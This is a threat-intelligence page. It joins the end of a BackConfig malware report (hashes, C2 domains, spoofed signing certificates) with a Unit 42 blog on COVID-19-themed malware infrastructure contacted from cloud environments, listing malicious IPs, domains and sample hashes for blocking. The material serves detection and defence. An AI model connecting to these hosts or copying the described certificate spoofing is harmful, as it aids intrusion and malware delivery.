021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b
be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461
0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf
ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb
752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (RTF using CVE-2017-11882)

Batch Files

4BAFBF6000A003EB03F31023945A101813654D26B7F3E402D1F51B7608B93BCB (Audio.txt / .bat from Naya Housing campaign)
C94f7733fc9bdbcb503efd000e5aef66d494291ae40fc516bb040b0d1d8b46c9
6a35d4158a5cb8e764777ba05c3d7d8a93a3865b24550bfb2eb8756c11b57be3
750fc47d8aa8c9ae7955291b9736e8292f02aaaa4f8118015e6927f78297f580
5292f4b4f38d41942016cf4b154b1ec65bb33dbc193a7e222270d4eea3578295
f64dbcd8b75efe7f4fa0c2881f0d62982773f33dcfd77cccb4afc64021af2d9e
98d27e830099c82b9807f19dcef1a25d7fce2c79a048d169a710b272e3f62f6e
29c5dd19b577162fe76a623d9a6dc558cfbd6cddca64ed53e870fe4b66b44096 (driverkit.bat)
abe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat uses bitsadmin)
02c306bb120148791418136dcea8eb93f8e97fb51b6657fd9468c73fb5ea786c

VBS files

87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt / .vbs from Naya Housing campaign)
952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c8b3ff8a651a231a (Down_LinkLog.vbs)
a1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs using BITS)

EXE Payloads

306fe259a250b2f0d939322cfb97787c4076c357fc9eb1f1cc10b0060f27f644
0f11fb955df07afc1912312f276c7fa3794ab85cd9f03b197c8bdbefb215fe92
84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c
18ce3eebbb093a218a8f566b579a5784caee94fadcda8f8c0d21f214ce2bd8b9
922d6e68ecac6dbfdd1985c2fae43e2fc88627df810897e3068d126169977709
4a4bc01b20dd2aaa2a2434dc677a44cc85d9533bed30bc58b8026b877db028d5
677d4982d714bb47fab613ebe1921005509ed0d1e8965e7241994e38c3ade9f2
d3013204f1a151c72879afc213dca3cada8c3ea617156b37771bdd7b7b74057f
91c67c1cda67b60c82e14a5c32d79a4236f5a82136317162dfbde1a6054cf8c1
de5b670656cbdbcf11607f01a6f93644765d9647ddab39b54946170b33f7ac9a
f79ebf038c7731ea3a19628cb329cada4ebb18f17439d9c6cf19d361b0494e7b
9e141fe67521b75412419a8c88c199c8ebd2a135c7a8b58edced454fbc33cb77
6787242a810f8a5e1423e83790064a0a98954ab0802a90649fdd55a47d75695e
e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f
07c97b253452a2a8eb7753ed8c333efeaa3546c005ffcfb5b3d71dc61c49abda
31faeefb4dc4e54b747387bb54a5213118970ccb2f141559f8e2b4dbfdbeb848
15109962da4899949863447bfdf6a6de87a8876f92adb7577392032df44ec892
D87b875b8641c538f90fe68cad4e9bdc89237dba137e934f80996e8731059861
167c7d7c08d318bc40e552e6e32715a869d2d62ba0305752b9b9bece6b9e337e
4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd (example of older set of downloaders)
b18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)

Infrastructure

linkrequest[.]live (23.106.123[.]87)
matissues[.]com
unique.fontsupdate[.]com
185.203.119[.]184
212.114.52[.]148

Digital Signatures

The following list of self-signed digital certificates is not exhaustive, and only relates to those seen on BackConfig PE executables samples over the past twelve months.

  • Foxit:

thumbprint: 79635cb32cf16cf6bddfd563b09d7aa99ccb2c01
issuer: CN=Foxit Software Incorporated
subject: CN=Foxit Software Incorporated
version: 3
algorithm: sha1WithRSAEncryption
serial: 50:53:ce:ad:42:c2:70:84:4f:55:bc:76:a4:23:6c:c8
valid from: 1/1/2018
valid to: 1/1/2024

  • Wind0ws:

thumbprint: aa9010ff841c67cf8fb88d7f1e86a778b35bcba0
issuer: CN=wind0ws
subject: CN=wind0ws
version: 3
algorithm: sha1WithRSAEncryption
serial: 88:de:2e:60:7f:48:2c:81:44:54:32:29:98:22:69:70
valid from: 1/1/2019
valid to: 1/1/2025

  • NVIDIA:

thumbprint: 01ba433fdc7f9b1ad1baaea6c5fd69243d03d8c3
issuer: CN=NVIDIA Corporation
subject: CN=NVIDIA Corporation
version: 3
algorithm: sha1WithRSAEncryption
serial: 6d:39:d4:59:15:9e:8c:b3:41:da:bd:4c:dd:37:60:e1
valid from: 1/1/2019
valid to: 1/1/2025

Appendix

The following VBS and BAT code was extracted from XLS sample (SHA-256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83).

  • VBS downloader component (SHA256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)

[Drive.txt -> Drive.vbs CODE]

  • “Setup” BAT component

[Audio.txt -> Audio.bat CODE]

 

COVID-19 Themed Malware Within Cloud Environments

Posted on by Nathaniel Quist

Executive Summary

Unit 42 researchers found that public cloud infrastructure has communicated with domains known to distribute COVID-19 themed malware. On March 24, 2020, Unit 42 published a blog discussing attack patterns used by malicious actors in relation to the novel Coronavirus (COVID-19). Taking these findings a step further, researchers attempted to uncover if there are malicious COVID-19 related events taking place within public cloud infrastructure. If indications of this activity were found, how could organizations protect themselves?

Researchers identified 300+ COVID-19 themed malware samples that communicated with 20 unique IP addresses and domain indicators of compromise (IOCs). After querying Prisma Cloud for network connections to these 20 suspicious IOCs between March 1 and April 7, 2020, researchers found a total of 453,074 unique network connections across 27 unique cloud environments (see Image 1).

    • 450,000+ cloud-based network connections with COVID-19 themed malware IoCs
    • Across 27 unique and potentially compromised cloud environments
    • Clear indications of communication with nodes known to perform command and control (C2) operations related to COVID-19 themed malware
Image 1. Workflow Diagram

It is not clear if each of the 27 identified organizations were in fact compromised with COVID-19 themed malware, as researchers were not able to view the network traffic nor did they receive the malware samples themselves which initiated the witnessed connections. Nonetheless, these network connections should be considered highly suspicious due to the fact that the destination endpoints have a documented history of malware operations.

The Research

Using AutoFocus, a Palo Alto Networks proprietary tool for malware-based threat intelligence research, Unit 42 researchers queried for malware samples that established network connections to domains that contained at least one of the following keywords: “Corona”, “COVID”, “Pandemic”, or “Virus”. Researchers then filtered the results based upon timestamps between March 1 and April 7, 2020. The metadata of these network connections was then analyzed and compared to the network traffic Palo Alto Networks Prisma Cloud maintains.

CAVEAT: Given the nature of network traffic, the network traffic content was not available for analysis, leaving only the network connection’s metadata as a sole means to identify malware network traffic.

AutoFocus returned more than 446 malware samples fitting COVID-19 themed domain network connections. These samples provided 20 unique domains and hard-coded IP addresses that could potentially serve or maintain the malware infrastructure. By resolving the domains to the most recently known host IP address, these IP addresses were used to query cloud network traffic connections between March 1 and April 7, 2020. The query returned 453,074 unique network connections from cloud environments, which were communicating to systems directly tied to the DNS activity of known COVID-19themed malware, see Image 1 above.

Table 1 lists the 18 IP addresses, which were identified within Prisma Cloud as well as what and if they are maintained by a content delivery network (CDN) provider.

IP Address CDN-Provider Count
8.251.31[.]254 Level3 91026
95.101.78[.]106 Akamai International 83624
95.101.78[.]82 Akamai International 81979
8.250.169[.]254 Level3 51091
8.250.183[.]254 Level3 49611
8.251.5[.]254 Level3 46864
8.251.15[.]254 Level3 40262
74.208.236[.]42 6742
120.138.17[.]203 Telstra Corp 765
104.28.9[.]246 Cloudflare Inc 458
104.31.74[.]50 Cloudflare Inc 420
5.79.72[.]163 72
31.170.167[.]123 66
103.140.250[.]215 32
51.77.161[.]45 27
45.81.226[.]17 19
91.234.99[.]234 12
45.128.134[.]14 4
Total Result 453074

Table 1. Total COVID-19 themed malware sample DNS activity samples queried through Prisma Cloud

The yellow highlighted values indicate IP addresses that resolve to CDN hosting platforms like Cloudflare, Level 3, and Akamai Hosting. CDN networks provide limited network information outside of session metadata. Given this limitation, researchers chose to exclude CDN IP addresses from this analysis no matter the likelihood of malicious content. Unit 42 also published the blog COVID-19: Cloud Threat Landscape which details CDN website hosting within cloud platforms.

Researchers were able to positively identify seven IP addresses that were witnessed as the destination network connection from 27 unique Prisma Cloud environments. These IP addresses resolve to independently hosted, non-CDN web servers, which have a known history of malicious activity both from the perspective of Unit 42 and from other reputable third-party threat sources like RiskIQ’s PassiveTotal and Hyas Insight. These seven IP addresses, and the domains from which they resolve, significantly increase the likelihood that they serve or maintain malicious content directly associated with COVID-19 themed malware and they are actively communicating with cloud environments, see Table 2.

IP Address Count
74.208.236.42 6742
5.79.72.163 72
31.170.167.123 66
103.140.250.215 32
51.77.161.45 27
45.81.226.17 19
91.234.99.234 12
Total Result 6970

Table 2. Non-CDN hosted domains and their associated Prisma Cloud network connections

Image 1 displays the network traffic percentages witnessed by these seven IP addresses.

Image 1. Percentage breakdown of suspicious network traffic

Historic Malware Activity

Researchers returned to AutoFocus to refine the malware sample results of these IP addresses. Researchers specifically targeted any malware sample that contains DNS activity with any IP address that is listed in Table 2. The results returned a total of 185 unique malware samples with an assortment of connections to known malware families and exploits like LokiBot, NanoCoreRAT, vulnerability exploits CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158, as well as having several connections to malware operations like Windows Word phishing documents and RTF_ASLR bypass.

While these malware families and exploits appear to have DNS activity linking them to these seven IP addresses, researchers are not suggesting that there exists any link with COVID-19 themed malware and these malware families or exploits outside of their IP infrastructure or DNS activity. For example, it is possible these particular systems could host and provide several variants of malware and it is also possible that more than one malicious group hosts and maintains their own C2 operations on one or more of the systems using the IP addresses in Table 2.

Additionally, each of these seven IP addresses was flagged as “Blacklisted by Third Parties” within PassiveTotal’s RiskIQ based upon the grounds of phishing, spam, C2 infrastructure, and malware distribution. With the AutoFocus evidence paired with the evidence gathered from RiskIQ’s PassiveTotal and Hyas Insight, researchers feel highly confident in determining these IP addresses as malicious and recommend that no cloud or traditional environment maintain any network communication with them.

Port Analysis

Researchers also analyzed the network sessions to determine the protocols most commonly used by the IP addresses listed in Table 2. As can be seen from the network traffic metadata, shown in Table 3, TCP Port 80 and TCP Port 443 make up 97% of the network traffic to and from these malicious IP addresses, although there are suspicious connections present on ports 25, 110, and 445.

Destination Port Destination IP Count
25 5.79.72.163 8
53 51.77.161.45 2
80 103.140.250.215 20
31.170.167.123 39
45.128.134.14 4
5.79.72.163 4
51.77.161.45 14
74.208.236.42 4086
110 51.77.161.45 3
443 103.140.250.215 12
31.170.167.123 27
5.79.72.163 56
51.77.161.45 8
74.208.236.42 2655
445 45.81.226.17 11
74.208.236.42 1
3389 45.81.226.17 8
5.79.72.163 4
Total Result 6962

Table 3. Destination port analysis of suspicious COVID-19themed network communications

Drill Down

For the remainder of this blog, the following four IP addresses will be specifically isolated as they hold the highest likelihood for serving or maintaining malicious COVID-19 themed content to cloud infrastructure, 74.208.236[.]42, 31.170.167[.]123, 5.79.72[.]163, and 51.77.161[.]45.

74.208.236[.]42

The IP address 74.208.236[.]42 comprised the majority of the network connections with 97% of the non-CDN traffic originating from cloud environments. This IP address is the sole resolution for the domain unlimitedimportandexport[.]com, which is flagged for malicious content regarding command and control infrastructure, malware distribution, and phishing operations using COVID-19 themed attacks.

AutoFocus contained 15 malware samples that perform network connections to the domain unlimitedimportandexport[.]com and it's resolving IP address 74.208.236[.]42, with a first seen date between March 1 and April 7, 2020. AutoFocus had tagged each of these malware samples as either ExcelLaunchPowerShell (12) or WinwordLaunchPowershell (7). No other domain was identified resolving to this IP address from any other AutoFocus samples. While the domain is not the only site hosted upon the system residing at 74.208.236[.]42, this IP address is to be considered highly suspicious and likely delivers malicious content to cloud environments.

31.170.167[.]123

Unit 42 released a blog on April 12, 2020, detailing Malicious Attackers Target Government and Medical Organizations With COVID-19 Themed Phishing Campaigns. Within that report, the IP address 31.170.167[.]123, which resolves from the domain www.tempinfo[.]96[.]it, was identified as the C2 node used to receive the username and hostname from the victim organization, which was then used to generate an AES encryption key. This encryption key is then returned to the victim by means of an HTTP POST from the URL www.tempinfo[.]96[.]lt/wras/savekey.php, and the encryption process is initiated.

This IP address was found to have network communications with three organizations within the Prisma Cloud network metadata. However, the organizations involved were not government or medical organizations, as they were detailed within the previous Unit 42 blog, but rather included a US-based business data and analytics firm, a US-based market analysis firm, and a US-based network analytic company. This IP indicator should be considered highly suspicious and all network communications with it should initiate an incident investigation.

5.79.72[.]163

The IP address 5.79.72[.]163 was witnessed interacting with six of the 27 disparate cloud environments. The IP address resolves to the domain teknik[.]io, which maintains a firm history of malicious actions including malware distribution operations. No other domain has been seen resolving to this IP address and any connections to this IP address should be considered suspicious.

AutoFocus contains 143 malware samples, associated with this domain and the resolving IP address, with a first seen date between March 1 and April 7, 2020. The vast majority of these malware samples were tagged as exploiting CVE-2017-11882 (130) or CVE-2017-0199 (21), with a couple of samples also tagged as LokiBot (10) and NanoCoreRAT (4). The malware appears to center around Windows operating systems and focuses on Rich Text File documents to infect systems. All network traffic to or from this domain and its resolving IP address should be considered highly suspicious and efforts should be made to terminate future network connections.

51.77.161[.]45

The IP address 51.77.161[.]45 has been linked to COVID-19themed malicious content via the domain kplico[.]com. This domain has been put on third-party denylists due to malware distribution and phishing attempts, and the system only appears to host-specific domains at specific times. These domains appear to rotate across 16 predominately Iranian-based domains

Analysis of the malware samples gathered from AutoFocus only consisted of three positive malware samples first seen during the March 1 through April 7, 2020 timeframe used for this research, tagged as CVE-2017-11882, CVE-2017-0199, and WinwordLaunchPowershell, however, there have been a total of 11 confirmed malware samples since January 27, 2020. All known malware samples make DNS requests to the domain kplico[.]com and Autofocus tags the majority of the older samples as NanoCoreRAT (6).

Conclusion

Of the 300+ malware samples identified to communicate with known COVID-19 related malware, 20 unique IP addresses and domains were identified. Network traffic from all known Prisma Cloud environments was queried using these 20 suspicious IP addresses and domains and a total of 453,074 unique network connections were identified between March 1 and April 7, 2020, see Image 1 above.

Of these network connections, seven IP addresses were identified, which gave a high likelihood of positive malware communications with cloud infrastructure. These communications are highly likely to contain malicious transmissions to and from infrastructure known to host COVID-19 related operations.

It is not clear if each of the 27 identified organizations was in fact compromised with COVID-19 themed malware, as researchers were not able to view the network traffic nor did they receive the malware samples themselves which initiated the witnessed connections. It is critical that every organization monitor their cloud infrastructure network communications to ensure that these types of malicious communications are identified and blocked. CNSP methodologies must be integrated into cloud infrastructure, development, and production environments to ensure these COVID-19themed attacks cannot be maintained within a cloud infrastructure.

Mitigation

Palo Alto Network Next-Generation Firewalls

Each of the IOCs listed within the following IOC section were added to the PAN-DB, which will allow each next-generation firewall, both hardware and VM-Series, to block network traffic to the identified IP addresses and domains, as well as block any of the malware samples listed within the report.

Prisma Cloud

Prisma Cloud has taken its first steps into integrating AutoFocus Indicators of Compromise (IoCs) into its operation base to ensure that cloud organizations can quickly identify when their cloud infrastructure communicates with known malicious malware. Now that Prisma Cloud combines AutoFocus with its ability to monitor cloud endpoints, detect malicious actions, and alert upon critical vulnerabilities, Prisma Cloud is able to monitor and protect single, hybrid, and multi-cloud environments using proven threat intelligence.

Cloud Native Security Platforms

Integrate Cloud Native Security Platforms (CNSP) into the CI/CD pipeline to ensure that cloud infrastructure is properly vetted for security risks. CNSPs share context about infrastructure, PaaS, users, development platforms, data and application workloads across platform components to enhance security. CNSP offers organizations the ability to deliver secure cloud infrastructure while simultaneously using the hallmarks of cloud, security automation, secure scalability, manageability, and secure on-demand resourcing.

IaC Scanning

Every Infrastructure-as-Code (IaC) template used within both development and production environments should be scanned for misconfigurations and vulnerabilities prior to its use. According to the Unit 42 Cloud Threat Report: Spring 2020, more than 42% of all IaC templates pulled from GitHub contain at least one misconfiguration or vulnerability.

Indicators of Compromise (IOCs)

IP Addresses

5.79.72[.]163

31.170.167[.]123

45.81.226[.]17

51.77.161[.]45

74.208.236[.]42

91.234.99[.]234

103.140.250[.]215

Domains

kplico[.]com

teknik[.]io

tempinfo[.]96[.]it

unlimitedimportandexport[.]com

Hashes

015d9c9a42e23532cbff50f9f65d90b7e5e53b0b8df676ee6a13f4177e3eae35

025c3d602e548ddb3bd9b640c26665d836a45dd583a4942ae9730c02f1f1a12c

0411028730acd0a55c6077ad8f58b72fa4362da33d88445ae5cb4e33a909ae92

0537f15b4051942430191340336a785f8c690a8aa29571d7a0dde843c5d9b0ed

0578e68d8770cfd9c073f44a4262666ca8114a905f95eb68dc2ce3258c7d0c1d

082ef0b013bab1fb3c9f99aa50a1c039b1c9bb25e84ee37d88b90a513c28ee05

0b56480f83dede82b7e331f82144421bf69b2009d4aead0d1c577fd6329029b3

0e3bb07880b9e2cd3da9aed3ae2e0596ceb63654766ea5b79282282a2159bf48

0fc6ceef04ce6de9ba41ea9d2651d9962bd2b7c5e092df4b71f42cad64c90a92

11bf5382ba0dc36ecaad3ce47cdc6890fbaa22d401716cd149d29741ea487120

1431e293da7a89a08a80ba63f13090050b15f4dc1d28cc752949858aa7690707

1441d6db9a2dccc8a57982f7ac4feab62f0621c8f36bebfb5971a7d7233cb309

164f917cb665c788adb9908444d90e1f9fed0ea2942e5744f5f3a72be92747c8

16a74b44f1d4ca3b850910182d2e87b2317f7aa9becb15d330416eee1fb55e07

1714b62d8d44cc289726b966be8598b5a7e416cd0c85050be9d395d36610a66d

1766f9752af45a8655f716562d0dd93714e2009fc04474c6734d5daebb95162c

19c169929dc46269b669c9c92fc0445a5057666a1e443208a57dcbf8686d9a1e

19ec071e413a88d0de44d0837486ecb6adfdbfeb85edd64db560af556effe7ee

1aaf862d0f14d85e2870503db000bec25c0952413b12f039ecc32f61cf565131

1ac34ed069159715ada83bc926d6b7d70447d6d45e382d2b8fba04ca1f7ee86b

1c935aa3a65ad9d045838f5297c1386a5a152beb12b40331459461d088c4538c

2185a33735010dcb8e22ff8301111e714596edce67fe82ec349bf8aaeab29033

21c267e76b886f9289947481999034fae58ae2575f063b78bf584ba6dd96ef0d

23f04285f6494f8670e984d559ef9d265f0e28fcb1f3636a2751bf97e89f5306

242c590d3582149d465f90063f1a64fcc29875834e667b3b2e934ab58c1a7a19

2466a4b6df523b21a2a97f5f6cfa15a14aca084e3f9e5e24aac0394d60616800

247832fc2d01c4b163372c005185cbd7d0352ceccec2a277bc968ea4da630639

253f00d16f2d35d43baeb88afba5d01c4151877c8c42e168e691e50eda87b2fb

271cdfbeace863d7fc6ad9ccb19ca74855088acbf0be761634e5f9276d5321c0

271dee34bdf71e407ea2424560be0f12f736b1a2f6c9af91aec5d1f4b9216d00

2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326

277ca0574a1ff8cbebe3f30e59736775962135aaa5ff0f7decd2b6c247a4ae8a

28aeda6b35141c7e54b3bac3f6d5255e01db9cd4567dcfed8168da734d7c0669

2ab43f60b558d7448afe4855c8bb6d0cf8fab6e16e7848154ed0b98c72eb77e8

35184145261c318d0e348638b995b5d0d165217f0ae53067ed4c40bcc653db29

354dc02a498c1a963689f314a0bc72f36771e41b8f8798e78d0da2cb860fbec5

3599c1bcdd715ce17c8bbe2535edb4dcb4b5ab94b8a9807b2378cbabd1a13e02

3b54e98cb52fb06929e70dfedea7f6265dc522225e2eb1db149da231a5b87b2f

3c37b32cc0cf0da87c3d47545ec79cf41b8662b0354551e3217276f891f12a22

3dfb211685c0945841184e5215c37889ea180a7f454a55a80a4de7fb5cb4314e

3e168b8fb92ab777b647491dea631b06effd8b32b75d41143f266f30e146e030

3e4bbe926935e71625578822e326a501d7e268bf0a4903b279855cff9015ea0c

3ecd8af401ac56c61538c3e1bf396c3a7acba0cb89d624a29044833bd815b160

41a69c13aec8be3e1f725a73d98727447f73ab1f4c7fa2baa9bbce8618df8ca1

41b2c6afecf797ab0fa9532a9327a1f19a5c58e13635ba7bd0e9deb45dfd5170

42945e863a1e8054ca89d90759f299722a1d7ff9b9762cbac73214bda828fcf6

42f04025460e5a6fc16d6182ee264d103d9bcd03fffd782c10f0b2e82b84f768

4409d981edc3b15f5c58995200aef4609af5a32aab9da7d596f108e29e48ed61

44fb4d09a80e4afc69cac7409c23e126262b606a909dd421146aa5e06aa2d390

458f33a1dc34e0b587dda65f10238f590738abe8a453511fab0558144b919e37

46f0d3ab6b68d84847c04820d7f2e590727ce4c87e96f29dfc3e1ecac8b404f6

47123fb92a882213d89fda07f28f3d1713259d1c8842326f7bc27488d4c48155

49480dfd1f5349234b92a3ee08263071a8acecab2ff5b188c242ba84bf880e90

4a1f043432e9810242ba29a67b5b2e7e501754a06f3cadaffbbbf766a9116f8e

4c11d68b80ac96302f79f23586cb40b6d7a5235875c14ae00a8d9203fa574a65

4c73d0437cb52e082b00c5100bab779399b18548f41da43a3a127f8343bdc847

4c874ab6c0b01cba06ffa454a37e878d4c7b8cb8cc0ed00a8c410a9833eed407

4dc69e5b5aca4c147121bf37f0f659dd0976f8c75c00b942f5a095f68938702a

4dcaaa0534d2a270a5e1c9ce5464c8ce826b7767108392a2616da9a25ff267a8

4fd2d7d93ea4cb52a749c00773cae469a7054c0d99a88169e5a334e32f50f22a

508075b3374b4c3c47d257b5d794779a90418cbb1d68175c2abfa4ce5f24dd67

51e9ae4199f631c7df589bfe857568c609a6f57c43538dd27f9bb1f6932808e6

543d8be5723b82693a6f5326f435823e0b152c2d83f874b86a82f6fcbd931bc7

5529dd3374d902d4ec626f23b831cd3e4d0120d15d9a0dc16deb3d19784ab35c

55988e76af684dffd45346e4622245e5978187a2784eeb064b5bf616e80b09a0

55cfc6c24813143e41df3fd01d35e16602af309620ca45648eaf70cc257f4a2d

58a6710c62c4a11565cb66282a78356179ebf868724a89580821953e5e7b3746

58f7ca1e6626103f0274d20f590d7f693585816e00f0bd93884bc15d0a7247a2

599317272a363b0a30b2860560be79d2066d9881b66925cbc9948f3cec8397bc

59ad049d80b6e2cff529e4a26db3bcb25e5b5dfda49d87b4b031c13e62cb2288

5a4582018c5e5e90d37604f4a4e3598150919153e8b1edf4e64da392630b968d

5d9e4abeeecf4ac855880206049246abe0f49a14bfc693349a81605478dde63b

5e977b5c8d3f438e684ffe134027476dd90a4eff1bf4910d1b41f0d489f9a04d

5ea2d64f9c644433e995108afbbfa9bfc0077e45f5f96abbeba717fddfba8474

5fc201b8c6700a59586a14a8ac53165e662fee128038f204b73a3a0e795d547a

61115d27cb35e6bf9835761e1897e53182e62ecaa63c1f3533bbf24cc940e805

62d38f19e67013ce7b2a84cb17362c77e2f13134ee3f8743cbadde818483e617

6318684e58716680b882f26d8aecf04e0019ccaa31605629815c79f05a0a1838

6391e4c4a9632bce7a7f5b01a701b8e84aaf0be9f115e5daf910c41f3b5260fc

6535d0c2d59dc35f1c3951812b79e2a97b2862d4c0fe12cdc37f0ec641abf081

66f886cee2e281a481d03dfda28bbe8ada348087d24544403a23d0596ccd3753

67b268f1e4ec8cd13940eff3a442445dca813ca706993211ff32e9eda1db35b4

67e895b7e1d01ed661cf5f310da8d1f59337dffe967002728d55fffeed2bb56b

6dd31b038d84e748f8b873e31971c0fbb329f75979c5f520a8e460d0764b8370

6f9cf2d532cc8eea81df1ba495a300513fb2567d4e2dd343705b2aee698afc4d

7031315d4298f8030872ba6a4dc07903decc5a008fa01017c734c42b995f7d17

70471f7b4fa066ced7a8415d3c0219037daf4376a5af99232a714725c160046f

7172c41b8860618b6adf20a0443a7d4c2e93a6b01da97f8068d53d4194e37bbd

71cb2fdf87214765aa9af37ea331245afb6441a28eadb1f7ab35cacb8043bd61

74da88d674bf1d281e39aa18399d0f189e51dc87e9e3827b8c6182e2e0de0e7e

7512ef3971ca4d0a902342fe3b6dc465939fc7046222e7d50524eee83076e6ea

758594c0ffb7b7736d9705a830341da83d220a656c9651534af2c3d0ec2ecfe3

758d0addc5b5952f4367307e06b8c559376ea514286c2c56a1200cee230a790b

767cb6b6859090c2ff271e2a69a37ace6f13a98faec1608ef265d146567566bc

778c6ab3a1bdb991b6b37ec5d652b6c444a20fddb743962da34fb5302ed87728

7a23a1e1f4e13a03de911def8a14c110f18bd512bbcf2abea0bef2e3dd09cf68

7b427b656ce425376a61a0d1caea523258aa44c8e4011d66089f02658263463e

7d57545c0bc2f5d52e90be220fc224ca48b3b6b697f5ae34333122df2224a4ef

7ea775ce3d1bbec6a0956b651d6faa66c9c56c7c9fabb700cc8f4f2a972e6aa2

7ec29d0c7759e0a04b9aa24104232df451b29dbbad9951add42cd23ef3292d07

7f07f14d5ba0dcdd810db7cf047045eb306600823ca0a7dac88c0b52d3930d4d

7f1c867216e3d37b54c5e07dae0dde6712a204eab13aa464df23f14ddc968606

81e98135951b22364f0679cae1590b14463adf27f6d55659d0f3104bbec79780

8332b625d3b6280762ef9fe393da174c65d390b3834d95865904854922eeda3f

8476cc9f2ad18d2bb884e4fc70e81d2cf4cd4036085ccd9f9aaee08ef50367af

849cac7f9689229de2eb83845295d5e061fe5a35388534054b9098a0eb256e1f

865c3d5398639b15b66ded5441836610bc82d3c996e707ff8741c8b7fce482d5

89a63aeb18c87652e6c68ca582fea6e12e88b519e21f52ee9e649ab92e720c4a

8d58014569735fafade5ff971e9f19b885503f693a0f32e685b9829bd67e679f

8dcf7eba4af16338b5ac343f55176ae836214e54677db9c1d9128afb96dd05b5

8f6f6c9140a3d265363dbbd34d552eda964c5f9c042a93c86ac29dfd05896ff8

8fbc5a54150922aef7fbc914fe72cd663bc23bf0a33eb4c8659cd79d53d6cd9b

91a981113c630434212a4ed9cf0362ed514dbc2c52e235a3875cabc4cafadebc

91cc37ccdece55aa4cca2532a846126fa463927c3f10343716314f04a27c3c79

984eeddd872274e16a4a24d42a66dd99110793fe64e46db525d5c017cd5755b1

9b023002c7cdfa05d8ce487af118673563c11d98f95d095b208627d700971c74

9be3262c99cecb704a331b96d3f640f97efa094608daeddd8b9682f441faa5b1

9c28354579d2ce69df3f609cd46c6c53052c3546cd4c63205a6c88e6a229ec35

9e07f2ffae0b978cf6f36026d7a049691a43da206800bf3ad187c1bfee33928d

9eb1bd5605d05e9926a63256e6b77c2e5ea21a4b3798f0697108c4035efb3e42

9f0385a0967acc5d324628ea3f78ef86085a6ed59037bce26bcecb0d9ab5197c

9f5a60090ed1b94abc12d02ae1a43ae5a0eb37b108483ef0286d2c9f917b7476

a01c3c97b8b91ef4c69b3392fb57091546b1fb7c344d60b33dd5d778f58f6d07

a0400828ef967467fae9dc8bb83c658f8a493d05268aabc4f1fdf0f235a63d3e

a0f1cb4197fe6f18cc664ed6eacb6d2ef8597eca7723d4130f1b0ed5d5ad1669

a15a623767449a87179ca7276c16bc33825aad76c475870fcefbd62110c2120e

a4007fb26c4ac60b661a77839739f5db56b0d016c57611af013f4bbb21d672cf

a465aa7ac0dc2f7d868a6e682870f164f2738647bee1d7d337c710f0eb52bbfc

a4e2573420f85a738fe78b192e87c2f864aeaae89aa7377f2a4a11d909a0a824

a76a2c64c08cb5e96238ba19f9a038573ae6f61dd1ce2f63b8c9441b8b935990

a843b0c799c7ad34fa76f278db59da140d77af3a38295b0d74ea273013065ed4

a884b0fb2e540b4bfff1df58fb6b294ce638846b8ee6a296d3661881c570ffb1

aafb51a2fd04fbc38a549d648b7e96d62216a9a1908b0fa5c39357f88a8bf95f

ab458a1da7237fe9779357a20d2d5718bd84bfc67d121f9162f059f9deafc6dc

abe39297ce1526ff13e022ea2c68b5141a3aaf03551d9d95b260373d0bb17af3

adc9c3d9534ac4be11796a95c966840c88b69589a1a4b6b0426a996838afe4e0

ae26d3bdeaea73a75c7c3bd6c3faf9513a3fd957bba0f446d0fd4555d5428a15

ae6c08d1378963a1e602167ed9d70151769344ba77cfced1865a1643277a1319

b1a82ca1b059bd34b5c98560d7257b65c0906e518c578952c2328f3bf416bcd1

b4e585a0f192ed4fdea8909dc2c119bce45ca7e1b7a74ef45ba1c14cfa16a97e

b557edeb7c35a0545e780cfea1b057ed73a8835cbd80fc3534bf6b1da89975b1

b5d9082c42b9d649fed71d07156d65c0d8162b2adb761003b8946cc6d8c63fea

b639c0937a7b1f194bb980c7d601813c95c01c509220a153a62e9e79a53d2cda

b688f8534058c14a5a111f755f49c45ea101fa684b182039ff06958115866b81

b9728bf311577a2d9f8258296d9b6d326d0e9d32bec678c19601465e2a033fe8

ba36d885a562a6aec1dadcd654b4468e47f4b5aeb7c5b2aa642560536d74e5e6

baa31d36a1229ab1f21da18b7ef603e46a3abbf5e6163d471f1bdea8ab3a3281

bb399ed423a50afb359fbe7c769706196478c117869ebb6976aed43b3a7777a2

bf16e722984f266ed24480bbf2c796cd9cb6104324b066d6e086628c1b4d4b77

bfb5edf186a206a54b0002e4b44cfba96b6340ab3fc5654b5be662f8e7ae95ed

c0ca8040842789fd69497927dda9a1fa2813d7652467090cc88ee47a543e6085

c330346d40854e4a971cd0c6011f9dcb1484e85b6e42d8d48735312518ae4a9f

c35d1f026bc0c6a9acfbcd7959d2c781bd14059a0276a90be75b19e86433f500

c501f99a404c0866d9f8b3f9b71d4169cf07296923edeef1b2054cf1d937bef0

c5c43b340957830f5d7484ce06f9de0ef593d88f3d48c09cd2150e670661f672

c74c2bb7f954d5f3f806fd399fcec81522be1c02162a6821d31050de1dee1a92

c9440b0b18b92db64cb53c3f43e269c5906c7d13d2c2211755ae5abf253581ef

ca50c4d018bcc196bf53d3f02fafffe5045f31d17561e02fa6f4c4f2b0c7c05a

ce66f177d83b8c45367fa50e83c2378f04c4f9df88577e43879526e5b98b3c41

cf3aed798cf3d1ac93baff3a7b3b6aaf8227a356538a53c914b942ca2b689772

d15767f8ca42218de59e998a74faad26dbfc3327431be164b6aaae7a01957297

